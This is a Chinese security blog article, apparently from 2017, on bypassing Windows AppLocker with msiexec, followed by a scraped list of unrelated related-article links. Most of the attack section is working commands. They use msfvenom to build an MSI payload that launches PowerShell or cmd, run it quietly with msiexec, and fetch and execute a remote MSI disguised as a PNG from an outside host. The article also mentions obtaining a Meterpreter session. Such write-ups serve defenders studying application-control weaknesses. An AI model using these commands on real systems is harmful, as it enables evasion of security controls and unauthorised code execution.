本文讲的是绕过AppLocker系列之MSIEXEC的利用,MSIEXEC是Windows操作系统中的一个实用程序,可用于从命令行安装或配置产品。 如果环境配置不正确,则使用.MSI文件就可以允许攻击者执行权限升级或绕过AppLocker规则。 本文的以下内容表明,当系统配置为不阻止所有用户执行MSI文件时,那么系统就得不到正确的保护,因为任何一个AppLocker的可执行规则都可以轻松绕过。

可以使用Metasploit 的MsfVenom来生成用于执行命令或有效载荷的.MSI文件。

msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 199 bytes
Final size of msi file: 159744 bytes

使用 MsfVenom 生成 MSI 文件

运行powershell.msi 将会打开一个PowerShell会话,这样就可以绕过AppLocker的规则了,即使已经设置了所有用户都不可以执行PowerShell。

利用MSIEXEC 运行 PowerShell

同样可以利用这种方式运行cmd命令,即使Windows系统已经阻止了cmd命令的执行。

msiexec /quiet /i cmd.msi

执行上述命令后,就会弹出cmd的窗口。

另外,msiexec实用程序还可以运行已经重命名过的MSI文件,比如重命名为PNG的MSI文件。 这些文件可以在命令提示符中本地执行或从远程执行,当然也可以绕过AppLocker规则执行。

msiexec /q /i http://192.168.100.3/tmp/cmd.png

利用MSIEXEC执行PNG文件,弹出cmd

上述操作同样可以用在Meterpreter payload 执行MSI文件上。

利用MSI 执行 Meterpreter Payload

利用MSIEXEC获得Meterpreter 会话

原文发布时间为:2017年6月22日
本文作者:丝绸之路 
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
原文链接

绕过AppLocker系列之MSIEXEC的利用相关推荐

  1. 绕过AppLocker系列之MSBuild的利用

    本文讲的是绕过AppLocker系列之MSBuild的利用,Microsoft已经在.NET框架中发布了许多可以编译和执行代码的二进制文件.最初引入了MSBuild,以便开发人员在不安装Visual ...

  2. 如何利用msxsl绕过AppLocker?

    本文讲的是如何利用msxsl绕过AppLocker?, 0x00 前言 Casey Smith@subTee在twitter分享的一个技巧,使用包含微软签名的msxsl.exe能够执行JScript代 ...

  3. keras系列︱迁移学习:利用InceptionV3进行fine-tuning及预测、完美案例(五)

    之前在博客<keras系列︱图像多分类训练与利用bottleneck features进行微调(三)>一直在倒腾VGG16的fine-tuning,然后因为其中的Flatten层一直没有真 ...

  4. ROS系统MoveIt玩转双臂机器人系列(三)--利用controller控制实际机器人

    ROS系统MoveIt玩转双臂机器人系列(三)--利用controller控制实际机器人 注:本篇博文全部源码下载地址为:Git Repo. 1. 下载到本地后解压到当前文件夹然后运行:catkin_ ...

  5. 统计系列(四)利用Python进行假设检验

    统计系列(四)利用Python进行假设检验 z检验 主要应用场景:在大样本量的总体比例检验 核心:两样本的总体比例差异 单样本比例检验 # 检验样本合格率与0.38是否有差异 import numpy ...

  6. 统计系列(三)利用Python进行参数估计

    统计系列(三)利用Python进行参数估计 点估计 样本均值估计为总体均值,样本比例估计为总体比例. import numpy as npx = [1, 1, 0, 1, 0, 0, 1, 0, 1, ...

  7. 风险管理系列课程二:利用图技术优化反洗钱解决方案

    风险管理系列课程 随着相互关联的全球金融市场在规模和复杂性上快速增加,风险评估和监控所面临的挑战变得日益艰巨.一些复杂的金融工具数量激增,如信用违约互换和抵押担保证券,而且一旦出错,就会付出数以万亿的 ...

  8. 【Linux_Fedora_应用系列】_3_如何利用Smplayer播放WMV格式的文件

    在上一篇我们成功安装了视频播放器,并且成功安装里解码器[Linux_Fedora_应用系列]_2_如何安装视频播放器和视频文件解码 安装完的Smplayer的GUI的界面程序,可以播放FLV.AVI. ...

  9. VARCHART XGantt系列教程:如何利用颜色来丰富甘特图智能

    VARCHART XGantt是一款功能强大的甘特图控件.其模块化的设计让您可以创建满足您和您的客户所需求的应用程序(我们领先的甘特图控件VARCHART XGantt可用于DotNET,Active ...

  10. python微信爬取教程_PYTHON爬虫之旅系列教程之【利用Python开发微信公众平台一】...

    感谢大家的等待,好啦,都准备好瓜子.板凳,老司机要发车啦-- 本系列课程讲述"PYTHON爬虫之旅",具体大纲可参考:[PYTHON爬虫之旅]概要目录. 本节课讲述如何利用Pyth ...

最新文章

  1. java三角形创建子类_如何创建子类,以便参数属于Java中的子类类型
  2. 监控组件_分布式监控组件Cat,如何实现万亿级消息的高效存储?
  3. asp前端日历_asp显示日历效果
  4. c primer plus 第6版 中文版pdf_一种2-C聚酯修补填充剂
  5. PAT_B_1086_Java(15分)
  6. Linux C语言调用C++动态链接库
  7. 牛客网 【每日一题】5月28日题目精讲 Protecting the Flowers
  8. 七日掌握设计配色基础_掌握正确的基础知识:如何设计网站的导航,搜索和首页...
  9. mysql主从备份及原理分析
  10. 使用VSCODE开发UE4
  11. 【Spring 工厂】反转控制与依赖注入、Spring工厂创建复杂对象3种方式
  12. Android--Activity中使用Intent传值
  13. 为什么一般都使用 List list = new ArrayList() ,而不用 ArrayList alist = new ArrayList()呢?...
  14. linux缓冲设备,Linux设备驱动程序缓冲策略
  15. RK3288 开机时间和开机速度优化安卓系统优化
  16. Solidworks 3D Onshape 3D 繪圖自學分享
  17. 二维码和一维码生成器
  18. php+生成条形码18位,php实现在线生成条形码示例分享(条形码生成器)
  19. 用开源求解器和Pyomo实现灵活的班次安排
  20. 荣耀30pro系统_荣耀30pro和pro+的区别_荣耀30pro和pro+的区别对比详情 - 系统家园

热门文章

  1. 猜数游戏(人机交互)
  2. 阿里p9 Python工程师,进阶书籍推荐
  3. MIT CMS.300 Session 3 – DIGITAL ENVIRONMENTS GAMES 数字环境与游戏
  4. 【Numpy】1. n维数组,dtype,切片,索引
  5. 服务器常见的异常问题的解决方法
  6. 基于 Robot Framework 实现网络自动化测试
  7. R语言:rJava包的安装
  8. Linux重置root 密码
  9. Xcode No account for team . Add a new account in the Accounts preference pane or verify that your
  10. faker 无敌了,专注于制作假数据